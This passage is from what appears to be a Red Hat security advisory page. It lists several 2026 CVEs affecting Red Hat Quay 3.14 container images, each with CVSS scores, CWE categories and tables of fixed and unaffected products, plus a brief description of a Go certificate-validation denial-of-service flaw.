Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64		—

CVE-2026-25679

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-1286 - Improper Validation of Syntactic Correctness of Input

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix Workaround

Known not affected 23 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64	—	Workaround

Threats

Impact Important

CVE-2026-27459

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix Workaround

Known not affected 23 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64	—	Workaround

Threats

Impact Important

CVE-2026-29074

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-776 - Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix Workaround

Known not affected 23 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64	—	Workaround

Threats

Impact Important

CVE-2026-32280

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-770 - Allocation of Resources Without Limits or Throttling

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix

Known not affected 23 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64		—

Threats

Impact Important

CVE-2026-32281

A flaw was found in Go's `crypto/x509` package. A remote attacker could exploit this by presenting a specially crafted certificate chain containing a large number of policy mappings. This inefficient validation process consumes excessive resources, which can lead to a denial of service (DoS) for applications or systems performing certificate validation.

5.9 (Medium)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-1050 - Excessive Platform Resource Consumption within a Loop

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix Workaround

Known not affected 23 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64	—	Workaround
